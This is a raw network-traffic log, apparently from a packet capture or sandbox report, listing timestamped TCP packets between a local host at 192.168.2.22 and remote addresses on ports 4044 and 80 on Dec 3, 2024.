                                                                                                                                                                                  Dec 3, 2024 14:01:47.069627047 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.069756985 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.074069023 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.074192047 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.074273109 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.078854084 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.078870058 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.078943968 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.083329916 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.083688974 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.083730936 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.085668087 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.088368893 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.088382959 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.088975906 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.092869997 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.092886925 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.092932940 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.097506046 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.097521067 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.097559929 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.158974886 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.195681095 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.195708036 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.195983887 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.197499990 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.197602034 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.197709084 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.201399088 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.201411963 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.201462984 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.204912901 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.204926014 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.205029011 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.208529949 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.208677053 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.208733082 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.212306023 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.212321997 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.212363005 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.215579033 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.215692043 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.215730906 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.219038010 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.219130039 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.219332933 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.222467899 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.222553968 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.222596884 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.225779057 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.225842953 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.225886106 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.229057074 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.229106903 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.229197979 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.232315063 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.232417107 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.232481003 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.235657930 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.235795975 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.235853910 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.238774061 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.238884926 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.238931894 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.242046118 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.242130995 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.242185116 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.245466948 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.245665073 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.245708942 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.248738050 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.248884916 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.248924971 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.251771927 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.251878023 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.251915932 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.254988909 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.255106926 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.255172014 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.258409023 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.258490086 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.258528948 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.261512041 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.261738062 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.261852026 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.262480974 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.264764071 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.264931917 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.265038967 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.266783953 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.268021107 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.268101931 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.268162012 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.268883944 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.271265984 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.271455050 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.271527052 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.279373884 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.279520035 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.279580116 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.280957937 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.281145096 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.281213045 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.315943956 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.316009998 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.316039085 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.317672014 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.317743063 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.317790031 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.321456909 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.321577072 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.321618080 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.326107025 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.326127052 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.326162100 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.329015970 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.329109907 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.329159021 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.332218885 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.332325935 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.332381964 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.335656881 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.335678101 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.336054087 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.337304115 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.337383032 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.337440968 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.340553999 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.340605021 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.340670109 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.343861103 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.343960047 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.344003916 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.347080946 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.347146034 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.347239017 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.396960974 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.397058964 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.397105932 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.398246050 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.398375988 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.398426056 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.400857925 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.401031971 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.401072979 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.403269053 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.403476000 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.403521061 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.405807018 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.405900955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.405952930 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.408379078 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.408401012 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.408457994 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.410820961 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.410985947 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.411031008 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.413259029 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.413352966 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.413393974 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.415743113 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.415806055 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.415869951 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.415987015 CET8049180178.237.33.50192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.416033983 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:47.418247938 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.418380022 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.418428898 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.420994043 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.421088934 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.421160936 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.423227072 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.423336983 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.423388958 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.425669909 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.425729990 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.425806999 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.428086042 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.428210020 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.428289890 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.430609941 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.430727959 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.430774927 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.433063030 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.433170080 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.433254957 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.435520887 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.435661077 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.435715914 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.437966108 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.438076973 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.438138962 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.440479994 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.440551043 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.440601110 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.442969084 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.443056107 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.443146944 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.444920063 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.445179939 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.445307016 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.446963072 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.447081089 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.447143078 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.448405981 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.448592901 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.448632002 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.449826956 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.449956894 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.450027943 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.451162100 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.451225042 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.451332092 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.452697992 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.452786922 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.452856064 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.454365969 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.454477072 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.454582930 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.455909014 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.455976963 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.456057072 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.457465887 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.457585096 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.457703114 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.459076881 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.459192991 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.459253073 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.460704088 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.460812092 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.460892916 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.462302923 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.462460041 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.462529898 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.463871002 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.464040995 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.464164019 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.465459108 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.465581894 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.465655088 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.467006922 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.467053890 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.467122078 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.468559027 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.468658924 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.468714952 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.470160007 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.470427990 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.470474005 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.471661091 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.471791029 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.471837997 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.473287106 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.473351955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.473411083 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.474773884 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.474859953 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.474915981 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.476300955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.476489067 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.476532936 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.477852106 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.477948904 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.478003979 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.479402065 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.479516029 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.479561090 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.480990887 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.481065989 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.481146097 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.482496977 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.482572079 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.482614040 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.484054089 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.484199047 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.484287024 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.485812902 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.485934019 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.485977888 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.487200975 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.487221956 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.487265110 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.488682985 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.488749981 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.488857985 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.490314007 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.490405083 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.490452051 CET491794044192.168.2.2231.13.224.72
